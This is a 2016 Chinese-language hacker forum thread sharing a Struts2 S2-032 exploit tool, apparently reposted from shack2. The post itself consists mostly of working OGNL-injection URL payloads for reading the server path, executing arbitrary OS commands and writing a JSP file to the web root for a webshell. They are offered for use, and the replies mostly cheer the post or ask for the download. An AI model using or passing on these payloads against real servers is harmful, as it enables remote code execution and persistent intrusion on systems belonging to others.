社区首页 › 资源分享 › Struts2-032漏洞利用工具

90_ 发表于 2016-4-26 22:41:12

Struts2-032漏洞利用工具

转载自shack2

新鲜出炉支持Struts2 s2-032漏洞的检查利用。如果有对Struts2 S2-029 这个鸡肋漏洞有兴趣的可以找我要下检查工具，这个鸡肋工具就不在这里共享了。
顺便分享下我改写的exp：

S2-032 20160426漏洞参考 http://seclab.dbappsecurity.com.cn/?p=924

获取磁盘目录：
1.
method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding),%23path%3d%23req.getRealPath(%23parameters.pp),%23w%3d%23res.getWriter(),%23w.print(%23path),1?%23xx:%23request.toString&pp=%2f&encoding=UTF-8


执行命令:
1.
method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd).getInputStream()).useDelimiter(%23parameters.pp),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=whoami&pp=\\A&ppp=%20&encoding=UTF-8

2.
method:%23_memberAccess[%23parameters.name1]%3dtrue,%23_memberAccess[%23parameters.name]%3dtrue,%23_memberAccess[%23parameters.name2]%3d{},%23_memberAccess[%23parameters.name3]%3d{},%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding),%23w%3d%23res.getWriter(),%23s%3dnew%20java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd).getInputStream()).useDelimiter(%23parameters.pp),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&name=allowStaticMethodAccess&name1=allowPrivateAccess&name2=excludedPackageNamePatterns&name3=excludedClasses&cmd=whoami&pp=\\A&ppp=%20&encoding=UTF-8

上传文件：
1.
method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding),%23w%3d%23res.getWriter(),%23path%3d%23req.getRealPath(%23parameters.pp),new%20java.io.BufferedWriter(new%20java.io.FileWriter(%23path%2b%23parameters.shellname).append(%23parameters.shellContent)).close(),%23w.print(%23path),%23w.close(),1?%23xx:%23request.toString&shellname=stest.jsp&shellContent=tttt&encoding=UTF-8&pp=%2f



**** Hidden Message *****

ihonker08sec 发表于 2016-4-27 08:24:33

支持红客联盟

csadsl 发表于 2016-4-27 09:48:39

有下载工具么

远古葫芦娃 发表于 2016-4-27 10:07:06

:lol:lol:lol

Silence7 发表于 2016-4-27 10:21:03

我来看看 90牛x

张小强 发表于 2016-4-27 10:25:07

看下怎么样

lincx 发表于 2016-4-27 10:28:26

来学习的

wht1161032908 发表于 2016-4-27 11:09:21

这个漏洞今天爆炸了

浮尘 发表于 2016-4-27 12:17:33

wht1161032908 发表于 2016-4-27 11:09
这个漏洞今天爆炸了

昨晚就已经爆炸了

tzwl2016 发表于 2016-4-27 12:32:56

{:2_25:}{:2_25:}

查看完整版本: Struts2-032漏洞利用工具